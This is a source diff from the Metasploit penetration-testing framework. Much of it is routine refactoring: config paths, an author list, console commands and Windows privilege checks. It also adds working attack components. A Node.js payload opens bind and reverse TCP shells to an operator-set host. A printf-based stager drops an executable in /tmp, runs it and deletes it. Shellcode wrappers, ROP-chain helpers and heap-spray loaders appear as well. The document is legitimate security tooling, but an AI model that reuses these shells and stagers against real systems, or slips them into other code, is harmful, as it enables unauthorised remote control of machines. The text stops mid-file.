classpath = File.join(Msf::Config.install_root, "data", "exploits", "msfJavaToolkit.jar")
classpath = File.join(Msf::Config.data_directory, "exploits", "msfJavaToolkit.jar")
classpath += ":" + toolsjar
classpath += ":" + datastore['ADDCLASSPATH'] if datastore['ADDCLASSPATH']

19
lib/msf/core/exploit/local/unix.rb
View File

@ -1,19 +0,0 @@
module Msf
module Exploit::Local::Unix
include Exploit::Local::CompileC
def unix_socket_h(metasm_exe)
[
"external/source/meterpreter/source/bionic/libc/include/sys/socket.h",
].each do |fname|
cparser.parse(File.read(fname), fname)
end
end
end
end

1
lib/msf/core/exploit/mixins.rb
View File

@ -26,6 +26,7 @@ require 'msf/core/exploit/cmdstager_debug_asm'
require 'msf/core/exploit/cmdstager_tftp'
require 'msf/core/exploit/cmdstager_bourne'
require 'msf/core/exploit/cmdstager_echo'
require 'msf/core/exploit/cmdstager_printf'
# Protocol
require 'msf/core/exploit/tcp'

2
lib/msf/core/exploit/mssql.rb
View File

@ -75,7 +75,7 @@ module Exploit::Remote::MSSQL
register_advanced_options(
[
OptPath.new('HEX2BINARY', [ false, "The path to the hex2binary script on the disk",
File.join(Msf::Config.install_root, "data", "exploits", "mssql", "h2b")
File.join(Msf::Config.data_directory, "exploits", "mssql", "h2b")
]),
OptString.new('DOMAIN', [ true, 'The domain to use for windows authentication', 'WORKSTATION'])
], Msf::Exploit::Remote::MSSQL)

2
lib/msf/core/exploit/mssql_sqli.rb
View File

@ -34,7 +34,7 @@ module Exploit::Remote::MSSQL_SQLI
register_advanced_options(
[
OptPath.new('HEX2BINARY', [ false, "The path to the hex2binary script on the disk",
File.join(Msf::Config.install_root, "data", "exploits", "mssql", "h2b")
File.join(Msf::Config.data_directory, "exploits", "mssql", "h2b")
])
], Msf::Exploit::Remote::MSSQL_SQLI)

2
lib/msf/core/exploit/mysql.rb
View File

@ -150,7 +150,7 @@ module Exploit::Remote::MYSQL
def mysql_upload_sys_udf(arch=:win32,target_path=nil)
fname = (arch == :win32 ? "lib_mysqludf_sys_32.dll" : "lib_mysqludf_sys_64.dll")
sys_dll = File.join( Msf::Config.install_root, "data", "exploits", "mysql", fname )
sys_dll = File.join( Msf::Config.data_directory, "exploits", "mysql", fname )
data = File.open(sys_dll, "rb") {|f| f.read f.stat.size}
blob = "0x"
blob << data.unpack("C*").map {|x| "%02x" % [x]}.join

6
lib/msf/core/exploit/powershell.rb
View File

@ -116,7 +116,7 @@ module Exploit::Powershell
ps_wrapper = <<EOS
$si = New-Object System.Diagnostics.ProcessStartInfo
$si.FileName = "#{ps_bin}"
$si.FileName = #{ps_bin}
$si.Arguments = '#{ps_args}'
$si.UseShellExecute = $false
$si.RedirectStandardOutput = $true
@ -146,11 +146,11 @@ EOS
psh_payload << "while(1){Start-Sleep -s #{sleep_time};#{fun_name};1};"
end
# Determine appropriate architecture
ps_bin = wow64 ? '$env:windir\syswow64\WindowsPowerShell\v1.0\powershell.exe' : 'powershell.exe'
ps_bin = wow64 ? '$env:windir+\'\syswow64\WindowsPowerShell\v1.0\powershell.exe\'' : '\'powershell.exe\''
# Wrap in hidden runtime
psh_payload = run_hidden_psh(psh_payload,ps_bin)
# Convert to base64 for -encodedcommand execution
command = "%COMSPEC% /B /C start powershell.exe -Command \"#{psh_payload.gsub("\n",';').gsub('"','\"')}\"\r\n"
command = "%COMSPEC% /B /C start powershell.exe -Command #{psh_payload.gsub("\n",';').gsub('"','\"')}\r\n"
end
#

2
lib/msf/core/exploit/sunrpc.rb
View File

@ -150,7 +150,7 @@ module Exploit::Remote::SunRPC
end
def progresolv(number)
names = File.join(Msf::Config.install_root, "data", "wordlists", "rpc_names.txt")
names = File.join(Msf::Config.data_directory, "wordlists", "rpc_names.txt")
File.open(names, "rb").each_line do |line|
next if line.empty? || line =~ /^\s*#/

59
lib/msf/core/module/author.rb
View File

@ -12,39 +12,40 @@ class Msf::Module::Author
# A hash of known author names
Known =
{
'hdm' => 'hdm' + 0x40.chr + 'metasploit.com',
'spoonm' => 'spoonm' + 0x40.chr + 'no$email.com',
'skape' => 'mmiller' + 0x40.chr + 'hick.org',
'vlad902' => 'vlad902' + 0x40.chr + 'gmail.com',
'optyx' => 'optyx' + 0x40.chr + 'no$email.com',
'anonymous' => 'anonymous-contributor' + 0x40.chr + 'metasploit.com',
'stinko' => 'vinnie' + 0x40.chr + 'metasploit.com',
'MC' => 'mc' + 0x40.chr + 'metasploit.com',
'cazz' => 'bmc' + 0x40.chr + 'shmoo.com',
'pusscat' => 'pusscat' + 0x40.chr + 'metasploit.com',
'skylined' => 'skylined' + 0x40.chr + 'edup.tudelft.nl',
'patrick' => 'patrick' + 0x40.chr + 'osisecurity.com.au',
'Ramon de C Valle' => 'rcvalle' + 0x40.chr + 'metasploit.com',
'I)ruid' => 'druid' + 0x40.chr + 'caughq.org',
'egypt' => 'egypt' + 0x40.chr + 'metasploit.com',
'kris katterjohn' => 'katterjohn' + 0x40.chr + 'gmail.com',
'CG' => 'cg' + 0x40.chr + 'carnal0wnage.com',
'et' => 'et' + 0x40.chr + 'metasploit.com',
'sf' => 'stephen_fewer' + 0x40.chr + 'harmonysecurity.com',
'kf' => 'kf_list' + 0x40.chr + 'digitalmunition.com',
'ddz' => 'ddz' + 0x40.chr + 'theta44.org',
'jduck' => 'jduck' + 0x40.chr + 'metasploit.com',
'natron' => 'natron' + 0x40.chr + 'metasploit.com',
'todb' => 'todb' + 0x40.chr + 'metasploit.com',
'msmith' => 'msmith' + 0x40.chr + 'metasploit.com',
'jcran' => 'jcran' + 0x40.chr + 'metasploit.com',
'sinn3r' => 'sinn3r' + 0x40.chr + 'metasploit.com',
'bannedit' => 'bannedit' + 0x40.chr + 'metasploit.com',
'amaloteaux' => 'alex_maloteaux' + 0x40.chr + 'metasploit.com',
'anonymous' => 'anonymous-contributor' + 0x40.chr + 'metasploit.com',
'bannedit' => 'bannedit' + 0x40.chr + 'metasploit.com',
'Carlos Perez' => 'carlos_perez' + 0x40.chr + 'darkoperator.com',
'cazz' => 'bmc' + 0x40.chr + 'shmoo.com',
'CG' => 'cg' + 0x40.chr + 'carnal0wnage.com',
'ddz' => 'ddz' + 0x40.chr + 'theta44.org',
'egypt' => 'egypt' + 0x40.chr + 'metasploit.com',
'et' => 'et' + 0x40.chr + 'metasploit.com',
'hdm' => 'hdm' + 0x40.chr + 'metasploit.com',
'I)ruid' => 'druid' + 0x40.chr + 'caughq.org',
'jcran' => 'jcran' + 0x40.chr + 'metasploit.com',
'jduck' => 'jduck' + 0x40.chr + 'metasploit.com',
'joev' => 'joev' + 0x40.chr + 'metasploit.com',
'juan vazquez' => 'juan.vazquez' + 0x40.chr + 'metasploit.com',
'kf' => 'kf_list' + 0x40.chr + 'digitalmunition.com',
'kris katterjohn' => 'katterjohn' + 0x40.chr + 'gmail.com',
'MC' => 'mc' + 0x40.chr + 'metasploit.com',
'msmith' => 'msmith' + 0x40.chr + 'metasploit.com',
'mubix' => 'mubix' + 0x40.chr + 'hak5.org',
'natron' => 'natron' + 0x40.chr + 'metasploit.com',
'optyx' => 'optyx' + 0x40.chr + 'no$email.com',
'patrick' => 'patrick' + 0x40.chr + 'osisecurity.com.au',
'pusscat' => 'pusscat' + 0x40.chr + 'metasploit.com',
'Ramon de C Valle' => 'rcvalle' + 0x40.chr + 'metasploit.com',
'sf' => 'stephen_fewer' + 0x40.chr + 'harmonysecurity.com',
'sinn3r' => 'sinn3r' + 0x40.chr + 'metasploit.com',
'skape' => 'mmiller' + 0x40.chr + 'hick.org',
'skylined' => 'skylined' + 0x40.chr + 'edup.tudelft.nl',
'spoonm' => 'spoonm' + 0x40.chr + 'no$email.com',
'stinko' => 'vinnie' + 0x40.chr + 'metasploit.com',
'theLightCosine' => 'theLightCosine' + 0x40.chr + 'metasploit.com',
'mubix' => 'mubix' + 0x40.chr + 'hak5.org'
'todb' => 'todb' + 0x40.chr + 'metasploit.com',
'vlad902' => 'vlad902' + 0x40.chr + 'gmail.com'
}
#

2
lib/msf/core/module/reference.rb
View File

@ -112,6 +112,8 @@ class Msf::Module::SiteReference < Msf::Module::Reference
self.site = 'http://www.kb.cert.org/vuls/id/' + in_ctx_val.to_s
elsif (in_ctx_id == 'BPS')
self.site = 'https://strikecenter.bpointsys.com/bps/advisory/BPS-' + in_ctx_val.to_s
elsif (in_ctx_id == 'ZDI')
self.site = 'http://www.zerodayinitiative.com/advisories/ZDI-' + in_ctx_val.to_s
elsif (in_ctx_id == 'URL')
self.site = in_ctx_val.to_s
else

70
lib/msf/core/payload/nodejs.rb Normal file
View File

@ -0,0 +1,70 @@
# -*- coding: binary -*-
require 'msf/core'
module Msf::Payload::NodeJS
# Outputs a javascript snippet that spawns a bind TCP shell
# @return [String] javascript code that executes bind TCP payload
def nodejs_bind_tcp
cmd = <<-EOS
(function(){
var require = global.require || global.process.mainModule.constructor._load;
if (!require) return;
var cmd = (global.process.platform.match(/^win/i)) ? "cmd" : "/bin/sh";
var net = require("net"),
cp = require("child_process"),
util = require("util");
var server = net.createServer(function(socket) {
var sh = cp.spawn(cmd, []);
socket.pipe(sh.stdin);
util.pump(sh.stdout, socket);
util.pump(sh.stderr, socket);
});
server.listen(#{datastore['LPORT']});
})();
EOS
cmd.gsub("\n",'').gsub(/\s+/,' ').gsub(/[']/, '\\\\\'')
end
# Outputs a javascript snippet that spawns a reverse TCP shell
# @param [Hash] opts the options to create the reverse TCP payload with
# @option opts [Boolean] :use_ssl use SSL when communicating with the shell. defaults to false.
# @return [String] javascript code that executes reverse TCP payload
def nodejs_reverse_tcp(opts={})
use_ssl = opts.fetch(:use_ssl, false)
tls_hash = if use_ssl then '{rejectUnauthorized:false}, ' else '' end
net_lib = if use_ssl then 'tls' else 'net' end
lhost = Rex::Socket.is_ipv6?(lhost) ? "[#{datastore['LHOST']}]" : datastore['LHOST']
# the global.process.mainModule.constructor._load fallback for require() is
# handy when the payload is eval()'d into a sandboxed context: the reference
# to 'require' is missing, but can be looked up from the 'global' object.
#
# however, this fallback might break in later versions of nodejs.
cmd = <<-EOS
(function(){
var require = global.require || global.process.mainModule.constructor._load;
if (!require) return;
var cmd = (global.process.platform.match(/^win/i)) ? "cmd" : "/bin/sh";
var net = require("#{net_lib}"),
cp = require("child_process"),
util = require("util"),
sh = cp.spawn(cmd, []);
var client = this;
client.socket = net.connect(#{datastore['LPORT']}, "#{lhost}", #{tls_hash} function() {
client.socket.pipe(sh.stdin);
util.pump(sh.stdout, client.socket);
util.pump(sh.stderr, client.socket);
});
})();
EOS
cmd.gsub("\n",'').gsub(/\s+/,' ').gsub(/[']/, '\\\\\'')
end
# Wraps the javascript code param in a "node" command invocation
# @param [String] code the javascript code to run
# @return [String] a command that invokes "node" and passes the code
def nodejs_cmd(code)
"node -e 'eval(\"#{Rex::Text.to_hex(code, "\\x")}\");'"
end
end

135
lib/msf/core/post/windows/priv.rb
View File

@ -1,9 +1,30 @@
# -*- coding: binary -*-
require 'msf/core/post/windows/accounts'
require 'msf/core/post/windows/registry'
module Msf::Post::Windows::Priv
include ::Msf::Post::Windows::Accounts
include Msf::Post::Windows::Registry
INTEGRITY_LEVEL_SID = {
:low => 'S-1-16-4096',
:medium => 'S-1-16-8192',
:high => 'S-1-16-12288',
:system => 'S-1-16-16384'
}
SYSTEM_SID = 'S-1-5-18'
ADMINISTRATORS_SID = 'S-1-5-32-544'
# http://technet.microsoft.com/en-us/library/dd835564(v=ws.10).aspx
# ConsentPromptBehaviorAdmin
UAC_NO_PROMPT = 0
UAC_PROMPT_CREDS_IF_SECURE_DESKTOP = 1
UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP = 2
UAC_PROMPT_CREDS = 3
UAC_PROMPT_CONSENT = 4
UAC_DEFAULT = 5
#
# Returns true if user is admin and false if not.
@ -13,34 +34,48 @@ module Msf::Post::Windows::Priv
# Assume true if the OS doesn't expose this (Windows 2000)
session.railgun.shell32.IsUserAnAdmin()["return"] rescue true
else
cmd = "cmd.exe /c reg query HKU\\S-1-5-19"
results = session.shell_command_token_win32(cmd)
if results =~ /Error/
return false
else
local_service_key = registry_enumkeys('HKU\S-1-5-19')
if local_service_key
return true
else
return false
end
end
end
#
# Returns true if in the administrator group
#
def is_in_admin_group?
whoami = get_whoami
if whoami.nil?
print_error("Unable to identify admin group membership")
return nil
elsif whoami.include? ADMINISTRATORS_SID
return true
else
return false
end
end
#
# Returns true if running as Local System
#
def is_system?
if session_has_ext
local_sys = resolve_sid("S-1-5-18")
local_sys = resolve_sid(SYSTEM_SID)
if session.sys.config.getuid == "#{local_sys[:domain]}\\#{local_sys[:name]}"
return true
else
return false
end
else
cmd = "cmd.exe /c reg query HKLM\\SAM\\SAM"
results = session.shell_command_token_win32(cmd)
if results =~ /Error/
return false
else
results = registry_enumkeys('HKLM\SAM\SAM')
if results
return true
else
return false
end
end
end
@ -55,24 +90,80 @@ module Msf::Post::Windows::Priv
uac = false
winversion = session.sys.config.sysinfo['OS']
if winversion =~ /Windows (Vista|7|2008)/
if session.sys.config.getuid != "NT AUTHORITY\\SYSTEM"
if winversion =~ /Windows (Vista|7|8|2008)/
unless is_system?
begin
key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System',KEY_READ)
if key.query_value('EnableLUA').data == 1
uac = true
end
key.close
rescue::Exception => e
print_error("Error Checking UAC: #{e.class} #{e}")
enable_lua = registry_getvaldata(
'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System',
'EnableLUA'
)
uac = (enable_lua == 1)
rescue Rex::Post::Meterpreter::RequestError => e
print_error("Error Checking if UAC is Enabled: #{e.class} #{e}")
end
end
end
return uac
end
#
# Returns the UAC Level
#
# @see http://technet.microsoft.com/en-us/library/dd835564(v=ws.10).aspx
# 2 - Always Notify, 5 - Default, 0 - Disabled
#
def get_uac_level
begin
uac_level = registry_getvaldata(
'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System',
'ConsentPromptBehaviorAdmin'
)
rescue Rex::Post::Meterpreter::RequestError => e
print_error("Error Checking UAC Level: #{e.class} #{e}")
end
if uac_level
return uac_level
else
return nil
end
end
#
# Returns the Integrity Level
#
def get_integrity_level
whoami = get_whoami
if whoami.nil?
print_error("Unable to identify integrity level")
return nil
else
INTEGRITY_LEVEL_SID.each_pair do |k,sid|
if whoami.include? sid
return sid
end
end
end
end
#
# Returns the output of whoami /groups
#
# Returns nil if Windows whoami is not available
#
def get_whoami
whoami = cmd_exec('cmd.exe /c whoami /groups')
if whoami.nil? or whoami.empty?
return nil
elsif whoami =~ /is not recognized/ or whoami =~ /extra operand/ or whoami =~ /Access is denied/
return nil
else
return whoami
end
end
#
# Return true if the session has extended capabilities (ie meterpreter)
#

50
lib/msf/ui/console/command_dispatcher/core.rb
View File

@ -107,6 +107,7 @@ class Core
"connect" => "Communicate with a host",
"color" => "Toggle color",
"exit" => "Exit the console",
"edit" => "Edit the current module with $VISUAL or $EDITOR",
"go_pro" => "Launch Metasploit web GUI",
"grep" => "Grep the output of another command",
"help" => "Help menu",
@ -627,6 +628,37 @@ class Core
true
end
def local_editor
Rex::Compat.getenv('VISUAL') || Rex::Compat.getenv('EDITOR') || '/usr/bin/vim'
end
def cmd_edit_help
msg = "Edit the currently active module"
msg = "#{msg} #{local_editor ? "with #{local_editor}" : "($VISUAL or $EDITOR must be set first)"}."
print_line "Usage: edit"
print_line
print_line msg
print_line "When done editing, you must reload the module with 'reload' or 'rexploit'."
print_line
end
#
# Edit the currently active module
#
def cmd_edit
unless local_editor
print_error "$VISUAL or $EDITOR must be set first. Try 'export EDITOR=/usr/bin/vim'"
return
end
if active_module
path = active_module.file_path
print_status "Launching #{local_editor} #{path}"
system(local_editor,path)
else
print_error "Nothing to edit -- try using a module first."
end
end
#
# Instructs the driver to stop executing.
#
@ -989,7 +1021,7 @@ class Core
def cmd_load_help
print_line "Usage: load <path> [var=val var=val ...]"
print_line
print_line "Loads a plugin from the supplied path. If path is not absolute, fist looks"
print_line "Loads a plugin from the supplied path. If path is not absolute, first looks"
print_line "in the user's plugin directory (#{Msf::Config.user_plugin_directory}) then"
print_line "in the framework root plugin directory (#{Msf::Config.plugin_directory})."
print_line "The optional var=val options are custom parameters that can be passed to plugins."
@ -3081,14 +3113,14 @@ class Core
'Columns' => columns
)
[
[ 'ConsoleLogging', framework.datastore['ConsoleLogging'] || '', 'Log all console input and output' ],
[ 'LogLevel', framework.datastore['LogLevel'] || '', 'Verbosity of logs (default 0, max 5)' ],
[ 'MinimumRank', framework.datastore['MinimumRank'] || '', 'The minimum rank of exploits that will run without explicit confirmation' ],
[ 'SessionLogging', framework.datastore['SessionLogging'] || '', 'Log all input and output for sessions' ],
[ 'TimestampOutput', framework.datastore['TimestampOutput'] || '', 'Prefix all console output with a timestamp' ],
[ 'Prompt', framework.datastore['Prompt'] || '', "The prompt string, defaults to \"#{Msf::Ui::Console::Driver::DefaultPrompt}\"" ],
[ 'PromptChar', framework.datastore['PromptChar'] || '', "The prompt character, defaults to \"#{Msf::Ui::Console::Driver::DefaultPromptChar}\"" ],
[ 'PromptTimeFormat', framework.datastore['PromptTimeFormat'] || '', 'A format for timestamp escapes in the prompt, see ruby\'s strftime docs' ],
[ 'ConsoleLogging', framework.datastore['ConsoleLogging'] || "false", 'Log all console input and output' ],
[ 'LogLevel', framework.datastore['LogLevel'] || "0", 'Verbosity of logs (default 0, max 5)' ],
[ 'MinimumRank', framework.datastore['MinimumRank'] || "0", 'The minimum rank of exploits that will run without explicit confirmation' ],
[ 'SessionLogging', framework.datastore['SessionLogging'] || "false", 'Log all input and output for sessions' ],
[ 'TimestampOutput', framework.datastore['TimestampOutput'] || "false", 'Prefix all console output with a timestamp' ],
[ 'Prompt', framework.datastore['Prompt'] || Msf::Ui::Console::Driver::DefaultPrompt.to_s.gsub(/%.../,"") , "The prompt string" ],
[ 'PromptChar', framework.datastore['PromptChar'] || Msf::Ui::Console::Driver::DefaultPromptChar.to_s.gsub(/%.../,""), "The prompt character" ],
[ 'PromptTimeFormat', framework.datastore['PromptTimeFormat'] || Time::DATE_FORMATS[:db].to_s, 'Format for timestamp escapes in prompts' ],
].each { |r| tbl << r }
print(tbl.to_s)

8
lib/msf/util/exe.rb Executable file → Normal file
View File

@ -824,8 +824,8 @@ def self.to_vba(framework,code,opts={})
persist = opts[:persist] || false
hash_sub = {}
hash_sub[:var_shellcode] = ""
hash_sub[:var_bytes] = Rex::Text.rand_text_alpha(rand(4)+4) # repeated a large number of times, so keep this one small
hash_sub[:var_shellcode] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:exe_filename] = Rex::Text.rand_text_alpha(rand(8)+8) << '.exe'
hash_sub[:var_fname] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_func] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_stream] = Rex::Text.rand_text_alpha(rand(8)+8)
@ -835,7 +835,7 @@ def self.to_vba(framework,code,opts={})
hash_sub[:var_tempexe] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_basedir] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_shellcode] = Rex::Text.to_vbscript(exes, hash_sub[:var_bytes])
hash_sub[:hex_shellcode] = exes.unpack('H*').join('')
hash_sub[:init] = ""
@ -910,7 +910,7 @@ def self.to_vba(framework,code,opts={})
hash_sub[:var_compileParams] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_syscode] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:shellcode] = Rex::Text.to_powershell(code, hash_sub[:var_code])
hash_sub[:b64shellcode] = Rex::Text.encode_base64(code)
return read_replace_script_template("to_mem_dotnet.ps1.template", hash_sub).gsub(/(?<!\r)\n/, "\r\n")
end

1
lib/rex/exploitation/cmdstager.rb
View File

@ -7,3 +7,4 @@ require 'rex/exploitation/cmdstager/debug_asm'
require 'rex/exploitation/cmdstager/tftp'
require 'rex/exploitation/cmdstager/bourne'
require 'rex/exploitation/cmdstager/echo'
require 'rex/exploitation/cmdstager/printf'

122
lib/rex/exploitation/cmdstager/printf.rb Normal file
View File

@ -0,0 +1,122 @@
# -*- coding: binary -*-
require 'rex/text'
require 'rex/arch'
require 'msf/core/framework'
require 'shellwords'
module Rex
module Exploitation
class CmdStagerPrintf < CmdStagerBase
def initialize(exe)
super
@var_elf = Rex::Text.rand_text_alpha(5)
end
#
# Override to ensure opts[:temp] is a correct *nix path
#
def generate(opts = {})
opts[:temp] = opts[:temp] || '/tmp/'
opts[:temp].gsub!(/\\/, '/')
opts[:temp] = opts[:temp].shellescape
opts[:temp] << '/' if opts[:temp][-1,1] != '/'
super
end
#
# Override to set the extra byte count
#
def generate_cmds(opts)
if opts[:noquotes]
@cmd_start = "printf "
@cmd_end = ">>#{@tempdir}#{@var_elf}"
@prefix = '\\\\'
min_part_size = 5
else
@cmd_start = "printf '"
@cmd_end = "'>>#{@tempdir}#{@var_elf}"
@prefix = '\\'
min_part_size = 4
end
xtra_len = @cmd_start.length + @cmd_end.length
opts.merge!({ :extra => xtra_len })
if (opts[:linemax] - opts[:extra]) < min_part_size
raise RuntimeError, "Not enough space for command - #{opts[:extra] + min_part_size} byte required, #{opts[:linemax]} byte available"
end
super
end
#
# Encode into a "\12\345" octal format that printf understands
#
def encode_payload(opts)
return Rex::Text.to_octal(@exe, @prefix)
end
#
# Override it to ensure that the octal representation of a byte isn't cut
#
def slice_up_payload(encoded, opts)
encoded_dup = encoded.dup
parts = []
xtra_len = opts[:extra]
xtra_len ||= 0
while (encoded_dup.length > 0)
temp = encoded_dup.slice(0, (opts[:linemax] - xtra_len))
# remove the last octal escape if it is imcomplete
if encoded_dup.length > temp.length and encoded_dup[temp.length, @prefix.length] != @prefix
pos = temp.rindex('\\')
pos -= 1 if temp[pos-1] == '\\'
temp.slice!(pos..temp.length-1)
end
parts << temp
encoded_dup.slice!(0, temp.length)
end
parts
end
#
# Combine the parts of the encoded file with the stuff that goes
# before and after it.
#
def parts_to_commands(parts, opts)
parts.map do |p|
@cmd_start + p + @cmd_end
end
end
#
# Since the binary has been already dropped to disk, just execute and
# delete it
#
def generate_cmds_decoder(opts)
cmds = []
# Make it all happen
cmds << "chmod +x #{@tempdir}#{@var_elf}"
cmds << "#{@tempdir}#{@var_elf}"
# Clean up after unless requested not to..
unless opts[:nodelete]
cmds << "rm -f #{@tempdir}#{@var_elf}"
end
return cmds
end
def cmd_concat_operator
" ; "
end
end
end
end

43
lib/rex/exploitation/javascriptosdetect.rb
View File

@ -1,43 +0,0 @@
# -*- coding: binary -*-
require 'msf/core'
require 'rex/text'
require 'rex/exploitation/jsobfu'
module Rex
module Exploitation
#
# Provides several javascript functions for determining the OS and browser versions of a client.
#
# getVersion(): returns an object with the following properties
# os_name - OS name, one of the Msf::OperatingSystems constants
# os_flavor - OS flavor as a string (e.g.: "XP", "2000")
# os_sp - OS service pack (e.g.: "SP2", will be empty on non-Windows)
# os_lang - OS language (e.g.: "en-us")
# ua_name - Client name, one of the Msf::HttpClients constants
# ua_version - Client version as a string (e.g.: "3.5.1", "6.0;SP2")
# arch - Architecture, one of the ARCH_* constants
#
# The following functions work on the version returned in obj.ua_version
#
# ua_ver_cmp(a, b): returns -1, 0, or 1 based on whether a < b, a == b, or a > b respectively
# ua_ver_lt(a, b): returns true if a < b
# ua_ver_gt(a, b): returns true if a > b
# ua_ver_eq(a, b): returns true if a == b
#
class JavascriptOSDetect < JSObfu
def initialize(custom_js = '', opts = {})
@js = custom_js
@js += ::File.read(::File.join(::File.dirname(__FILE__), "javascriptosdetect.js"))
super @js
return @js
end
end
end
end

6
lib/rex/exploitation/js.rb Normal file
View File

@ -0,0 +1,6 @@
# -*- coding: binary -*-
require 'rex/exploitation/js/memory'
require 'rex/exploitation/js/network'
require 'rex/exploitation/js/utils'
require 'rex/exploitation/js/detect'

56
lib/rex/exploitation/js/detect.rb Normal file
View File

@ -0,0 +1,56 @@
# -*- coding: binary -*-
require 'msf/core'
require 'rex/text'
require 'rex/exploitation/jsobfu'
module Rex
module Exploitation
module Js
class Detect
#
# Provides several javascript functions for determining the OS and browser versions of a client.
#
# getVersion(): returns an object with the following properties
# os_name - OS name, one of the Msf::OperatingSystems constants
# os_flavor - OS flavor as a string (e.g.: "XP", "2000")
# os_sp - OS service pack (e.g.: "SP2", will be empty on non-Windows)
# os_lang - OS language (e.g.: "en-us")
# ua_name - Client name, one of the Msf::HttpClients constants
# ua_version - Client version as a string (e.g.: "3.5.1", "6.0;SP2")
# arch - Architecture, one of the ARCH_* constants
#
# The following functions work on the version returned in obj.ua_version
#
# ua_ver_cmp(a, b): returns -1, 0, or 1 based on whether a < b, a == b, or a > b respectively
# ua_ver_lt(a, b): returns true if a < b
# ua_ver_gt(a, b): returns true if a > b
# ua_ver_eq(a, b): returns true if a == b
#
def self.os(custom_js = '')
js = custom_js
js << ::File.read(::File.join(Msf::Config.data_directory, "js", "detect", "os.js"))
Rex::Exploitation::JSObfu.new(js)
end
#
# Provides javascript functions to determine addon information.
#
# getMsOfficeVersion(): Returns the version for Microsoft Office
#
def self.addons(custom_js = '')
js = custom_js
js << ::File.read(::File.join(Msf::Config.data_directory, "js", "detect", "addons.js"))
Rex::Exploitation::JSObfu.new(js)
end
end
end
end
end

52
lib/rex/exploitation/js/memory.rb Normal file
View File

@ -0,0 +1,52 @@
# -*- coding: binary -*-
require 'msf/core'
module Rex
module Exploitation
module Js
#
# Provides meomry manipulative functions in JavaScript
#
class Memory
def self.mstime_malloc
js = ::File.read(::File.join(Msf::Config.data_directory, "js", "memory", "mstime_malloc.js"))
js = js.gsub(/W00TA/, Rex::Text.rand_text_hex(6))
js = js.gsub(/W00TB/, Rex::Text.rand_text_hex(5))
::Rex::Exploitation::ObfuscateJS.new(js,
{
'Symbols' => {
'Variables' => %w{ buf eleId acTag }
}
}).obfuscate
end
def self.property_spray
js = ::File.read(::File.join(Msf::Config.data_directory, "js", "memory", "property_spray.js"))
::Rex::Exploitation::ObfuscateJS.new(js,
{
'Symbols' => {
'Variables' => %w{ sym_div_container data junk obj }
}
}).obfuscate
end
def self.heap_spray
js = ::File.read(::File.join(Msf::Config.data_directory, "js", "memory", "heap_spray.js"))
::Rex::Exploitation::ObfuscateJS.new(js,
{
'Symbols' => {
'Variables' => %w{ index heapSprayAddr_hi heapSprayAddr_lo retSlide heapBlockCnt }
}
}).obfuscate
end
end
end
end
end

28
lib/rex/exploitation/js/network.rb Normal file
View File

@ -0,0 +1,28 @@
# -*- coding: binary -*-
require 'msf/core'
module Rex
module Exploitation
module Js
#
# Provides networking functions in JavaScript
#
class Network
def self.ajax_download
js = ::File.read(::File.join(Msf::Config.data_directory, "js", "network", "ajax_download.js"))
::Rex::Exploitation::ObfuscateJS.new(js,
{
'Symbols' => {
'Variables' => %w{ xmlHttp }
}
}).obfuscate
end
end
end
end
end

33
lib/rex/exploitation/js/utils.rb Normal file
View File

@ -0,0 +1,33 @@
# -*- coding: binary -*-
require 'msf/core'
require 'rex/text'
require 'rex/exploitation/jsobfu'
module Rex
module Exploitation
module Js
#
# Javascript utilities
#
class Utils
def self.base64
js = ::File.read(::File.join(Msf::Config.data_directory, "js", "utils", "base64.js"))
opts = {
'Symbols' => {
'Variables' => %w{ Base64 encoding result _keyStr encoded_data utftext input_idx
input output chr chr1 chr2 chr3 enc1 enc2 enc3 enc4 },
'Methods' => %w{ _utf8_encode _utf8_decode encode decode }
}
}
::Rex::Exploitation::ObfuscateJS.new(js, opts).to_s
end
end
end
end
end

38
lib/rex/exploitation/ropdb.rb
View File

@ -29,7 +29,7 @@ class RopDb
#
# Returns an array of ROP gadgets. Each gadget can either be an offset, or a value (symbol or
# some integer). When the value is a symbol, it can be one of these: :nop, :junk, :size,
# and :size_negate.
# :unsafe_negate_size, and :safe_negate_size
# Note if no RoP is found, it returns an empry array.
# Arguments:
# rop_name - name of the ROP chain.
@ -90,8 +90,10 @@ class RopDb
Rex::Text.rand_text(4, badchars).unpack("V")[0].to_i
elsif e == :size
payload.length
elsif e == :size_negate
0xffffffff - payload.length + 1
elsif e == :unsafe_negate_size
get_unsafe_size(payload.length)
elsif e == :safe_negate_size
get_safe_size(payload.length)
else
e
end
@ -105,6 +107,28 @@ class RopDb
private
#
# Returns a size that's safe from null bytes.
# This function will keep incrementing the value of "s" until it's safe from null bytes.
#
def get_safe_size(s)
safe_size = get_unsafe_size(s)
while (safe_size.to_s(16).rjust(8, '0')).scan(/../).include?("00")
safe_size -= 1
end
safe_size
end
#
# Returns a size that might contain one or more null bytes
#
def get_unsafe_size(s)
0xffffffff - s + 1
end
#
# Checks if a ROP chain is compatible
#
@ -146,8 +170,10 @@ class RopDb
gadgets << :junk
when 'size'
gadgets << :size
when 'size_negate'
gadgets << :size_negate
when 'unsafe_negate_size'
gadgets << :unsafe_negate_size
when 'safe_negate_size'
gadgets << :safe_negate_size
else
gadgets << value.to_i(16)
end
@ -160,4 +186,4 @@ class RopDb
end
end
end
end

239
lib/rex/parser/outpost24_nokogiri.rb Normal file
View File

@ -0,0 +1,239 @@
require "rex/parser/nokogiri_doc_mixin"
module Rex
module Parser
load_nokogiri && class Outpost24Document < Nokogiri::XML::SAX::Document
include NokogiriDocMixin
def start_element(name, attrs)
@state[:current_tag][name] = true
case name
when "description", "information"
return unless in_tag("detaillist")
return unless in_tag("detail")
record_text
when "detail"
return unless in_tag("detaillist")
record_vuln
when "detaillist"
record_vulns
when "host"
return unless in_tag("hostlist")
record_host
when "hostlist"
record_hosts
when "id"
return unless in_tag("detaillist")
return unless in_tag("detail")
return unless in_tag("cve")
record_text
when "name"
return unless in_tag("hostlist") || in_tag("detaillist")
